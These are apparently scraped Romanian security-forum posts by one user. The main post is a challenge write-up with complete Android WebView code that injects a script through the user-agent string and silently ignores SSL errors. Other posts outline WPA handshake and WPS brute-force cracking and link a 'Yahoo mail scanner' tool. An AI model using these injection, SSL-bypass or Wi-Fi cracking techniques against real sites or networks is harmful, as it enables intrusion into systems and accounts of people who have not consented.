TheTime

Spoiler rezolvare. Frumoasa problema, n-am ce spune

Works great on firefox. img Nu doresc contul de steam. Baieti, bagati mare, inca mai aveti sanse.

ben20, Aranjaza-ti frumos portofoliul si incearca sa iti promovezi serviciile pe site-uri de freelancing. + anuntiri pe forumuri in domeniu

Cum, unde? Tu presupui ca poti sa ii executi victimei cod javascript inainte de a obtine XSS-ul?

https://rstforums.com/forum/69161-useragent-xss-folosind-aplicatii-android.rst ^ se pune drept rezolvare?

Worm32 a creat de curand un XSS Challenge in care trebuia sa iti modifici UserAgent-ul (UA) pentru a putea obtine XSS-ul. Toate bune si frumoase atunci cand este vorba de UA-ul tau, exista extensii care fac toata treaba, dar scopul unui XSS este sa executi scriptul pentru victime, nu pentru tine. In mod normal, nu avem access la UA-ul altor persoane, dar exista alternative: aplicatiile pentru android. Aplicatiile pentru android au un control numit WebView care nu face altceva decat sa iti incarce in aplicatie o pagina web sau un cod html propriu, oarecum asemanator cu un iframe. Este destul de bogat in optiuni si bine documentat, deci nu veti avea prea mari probleme in a va juca cu el. De asemenea, are si o setare, setUserAgentString(), care va permite sa modificati UA-ul utilizatorilor. Ca proof of concept, am creat un proiect simplu, UAxss, cu un layout ce contine webview-ul si o clasa main ce contine codul. activity_main.xml <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="fill_parent" android:layout_height="fill_parent" android:orientation="horizontal" android:layout_gravity="center"> <WebView android:id="@+id/webView1" android:layout_width="fill_parent" android:layout_height="fill_parent" android:layout_gravity="center" android:orientation="horizontal" /> </LinearLayout> MainActivity.java package com.example.uaxss; import android.net.http.SslError; import android.os.Bundle; import android.app.Activity; import android.webkit.SslErrorHandler; import android.webkit.WebChromeClient; import android.webkit.WebView; import android.webkit.WebViewClient; public class MainActivity extends Activity { WebView wb; // <-- webview-ul nostru private class XSSWebViewClient extends WebViewClient { @Override public boolean shouldOverrideUrlLoading(WebView view, String url) { return false; } @Override public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) { handler.proceed(); // in cazul in care apare vreo eroare ssl, o ignoram } } /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); wb=(WebView)findViewById(R.id.webView1); //cautam webview-ul din layout-ul nostru //setam UA-ul wb.getSettings().setUserAgentString("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0) --> <script>var oVariabila = setTimeout( function() { alert('Guess what? IT WORKS!'); window.location = 'http://www.google.ro' ;}, 5000)</script> <!--"); wb.getSettings().setJavaScriptEnabled(true); //ca sa putem executa javascript in pagina //ceva setari suplimentare wb.getSettings().setLoadWithOverviewMode(true); wb.getSettings().setUseWideViewPort(true); wb.getSettings().setBuiltInZoomControls(true); wb.setWebViewClient(new XSSWebViewClient(){}); wb.setWebChromeClient(new WebChromeClient()); //pentru javascript:alert() wb.loadUrl("http://worm32.zz.mu/challenges/"); //adresa de start } } Si, ca sa putem accesa internetul din aplicatie, trebuie sa adaugam in AndroidManifest.xml <uses-permission android:name="android.permission.INTERNET" /> Dupa cum se poate observa, pentru challenge-ul lui Worm32 am folosit urmatorul UA, care executa un alert dupa 5 secunde, apoi redirectioneaza catre google.com: "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0) --> <script>var oVariabila = setTimeout( function() { alert('Guess what? IT WORKS!'); window.location = 'http://www.google.ro' ;}, 5000)</script> <!--" Cateva imagini: Bonus: ^ Stiu ei ce stiu... Testat in simulator pe Android 4.2.2 si pe tableta cu Android 4.0.4. Aveti nevoie de Android 2.3.3+ ca sa va mearga. Download: Proiectul in Eclipse ADT si UAxss.apk Bonus2: alt site care nu filtreaza UA-ul, observati, va rog, ironia... Informatiile prezentate mai sus au rol pur informativ. Le-am publicat ca sa aveti un argument bun in cazul in care vreun program de bug bounty va respinge vreun astfel de xss pe motiv ca nu este exploatabil. Stay safe!

Eu mi-am trimis aplicatia, va sfatuiesc sa incercati si voi. Fiind un marketplace mic, aveti sanse bune sa va faceti aplicatiile cat mai vizibile.

26 Screenshot by Lightshot

http://s10.postimg.org/7lh6f00op/image.png Primesti PM cu sintaxa doar dupa ce faci publica sintaxa ta. Daca zici ca filtrul tau este "inspirat" de prin alte parti, nu vreau sa te ajut sa-i faci bypass. Daca vrei, apelam la un admin ca sa facem "schimb de sintaxe". Cheers!

Honeypot pentru vectori xss? Corecteaza-ma, te rog, daca ma insel.

Sunteti atat de ascunsi/protejati/anonimi pe internet incat sa poate face o statistica pe seama voastra! Ar trebui sa va dea de gandit...

Nu primesti despagubiri pentru asa ceva. In principiu, ca sa primesti despagubiri trebuie sa dovedesti ca ai avut daune, ceea ce nu cred ca este cazul. Daunele morale se obtin foarte greu, dupa mult timp si multi alti bani cheltuiti. Dar poti sa faci frumos o plangere la cea mai apropiata sectie de politie, arati mesajele, spui cat se poate de sincer cine crezi tu ca ar putea fi, eventual aduci si dovezi in acest sens.

Doar daca au wps-ul activat, fara protectie. Ma insel?

@Nytro: Diverse firme care angajeaza, oameni care cauta programatori pentru anumite proiecte, persoane ce vor sa angajeze "hackeri" sa sparga conturi de trilulilu... +1 pentru idee.

Nu stiu PHP, dar... <input type="text" name="from" value="<? print $_POST['from']; ?>" size="30"> pare a fi xss...

Nu e evident care sunt riscurile? Risti sa ramai fara banii investiti... Pentru toti jucatorii de bursa exista o regula de aur, regula pe care mai nimeni nu o respecta: cumperi atunci cand valoarea produsului este in crestere, vinzi atunci cand valoarea produsului este in scadere. Valoarea unui bitcoin este intr-o crestere exploziva, deci pare o afacere buna sa investesti in asa ceva, cu conditia sa vinzi tot in secunda in care observi ca incepe sa scada. Cu cat ii creste valoarea mai repede, cu atat o sa ii scada mai repede.

daatdraqq, probabil au pus ceva fara sa gandeasca, nu cred ca e posibil sa ajungi la un astfel de rezultat cu o logica de bun simt. Oricum, diagrama de mai sus imi confirma o banuiala: voi, dragii mei, nu ma intelegeti.

Gilbert, don't make double posts on this forum, we don't like that. About this topic, I think that secured networks are always to be desired, even if we talk about a monster-like government. Why? Because there is a need for privacy everywhere, because some things are just not meant to be public. There are other ways to reveal their dark secrets and I don't believe that hacking for justice is a solution.

Spide, e acelasi procedeu. Mai sus te invata pas cu pas cum sa capturezi un handshake iar apoi sa faci brute force pe el, pe baza unui dictionar. O alta metoda ar fi sa verifici daca are WPS-ul activat si sa faci un bruteforce pe acesta. Nu toate routerele au WPS activat, nu toate care il au activat merg supuse atacurilor, dar in cazurile favorabile parola iese mult mai repede. Daca chiar vrei sa spargi vreo retea cu wpa/wpa2, cam astea ar fi metodele.

"Hackyard"? Ce e aia?

http://speedy.sh/RgP2U/Yahoo-mail-scanner.rar TheTime4RST

Arunca o privire peste Eyefinity, tehnologie dezvoltata de AMD. Cu o singura placa video de la ATI poti sa iti construiesti un mega monitor format din pana la 24 de monitoare normale. Daca folosesti monitoare touchscreen (banuiesc ca nu vrei tastatura si mouse pentru fiecare monitor in parte, nu?), atunci fiecare monitor va putea fi folosit in scop propriu, ca si cum ar fi statie proprie. Tu, de la statia ta de lucru, trebuie insa sa pui pe fiecare monitor in parte ce ai nevoie. Asta e singura solutie care-mi vine in minte. Oricum, e complicat, multe cabluri, multe limitari, etc. De ce ai nevoie de asa ceva?

^ Poate ca si tu ai ceva cu Romania, sau poate e doar la moda sa-ti critici tara, dar ai partial dreptate. Imaginea de ansamblu e ca toate tarile au probleme de securitate IT. Tehnologia evolueaza mai repede decat pot masele sa o asimileze, iar intr-un domeniu necunoscut nu ai cum sa te simti in siguranta, indiferent de tara din care faci parte. Sistemele sunt vulnerabile, dar poti pune oricand 3 maimute sa urmeze cateva tutoriale si sa le securizeze. Adevarata problema in domeniul infosec sunt oamenii, fiinte care pe buna dreptate nu sunt inca pregatite sa faca parte dintr-un mediu digital.

@mah_one, E o discutie complicata, usor sensibila, dar daca vorbesti de drepturile tale fara sa iti indeplinesti in prealabil si indatoririle, cu siguranta nu ai dreptate. Era datoria ta sa iti iei biletul, daca ai fost prins fara nu e realist sa te astepti sa fii tratat dupa drepturile pe care le mentionezi. Din punct de vedere moral, contractul social nu mai e valabil daca nu iti respecti indatoririle. Din punct de vedere legal, legea nu va fi de partea celor care pagubesc, desi ne place noua sa citim printre randuri. Da, ei au facut abuz in serviciu, ar fi trebuit sa-ti iei avant si sa fugi de acolo. Sau, sa accepti ca ti-ai asumat un risc si sa suporti consecintele, fara a-i mai pune pe respectivii in situatia de a-si incalca atributiile. Oamenii aceia nu sunt platiti sa fie corecti, sunt platiti sa bage spaima si sa imprastie amenzi. Asta este. Data viitoare fugi. Punct. Sau asigura-te ca ai plan de rezerva. LE: http://metropotam.ro/La-zi/Ce-sa-faci-si-ce-sa-nu-faci-daca-te-prind-controlorii-art3324109848/

Mama ce v-as bate... v-as alinia pe toti, v-as da cate 2 palme peste fata, v-as pune pe burta sa faceti flotari si v-as tine sub un jet de apa rece de la furtun pana v-ati trezi la realitate sau pana v-ar veni mintea la cap. Nu de alta, dar multi dintre voi aveti un set groaznic de valori. Puteti sa-i laudati cat vreti, nici iceman si nici tinkode nu au facut nimic. Repet, nu au facut nimic! Ei au spart, au distrus, eventual s-au laudat inzecit cu ispravile lor, dar este o diferenta serioasa intre a face si a distruge. Si dragilor, lumea asta se bazeaza pe cei care fac, nu pe cei care vorbesc, nu pe taranii cu 3 dinti si 9 clase care distrug de parca ar fi la masa-n sufragerie. Inteleg ca acum tinkode s-a apucat de munca. Felicitari lui, cel putin incearca sa nu intre in aceeasi oala ca omul de inghetata.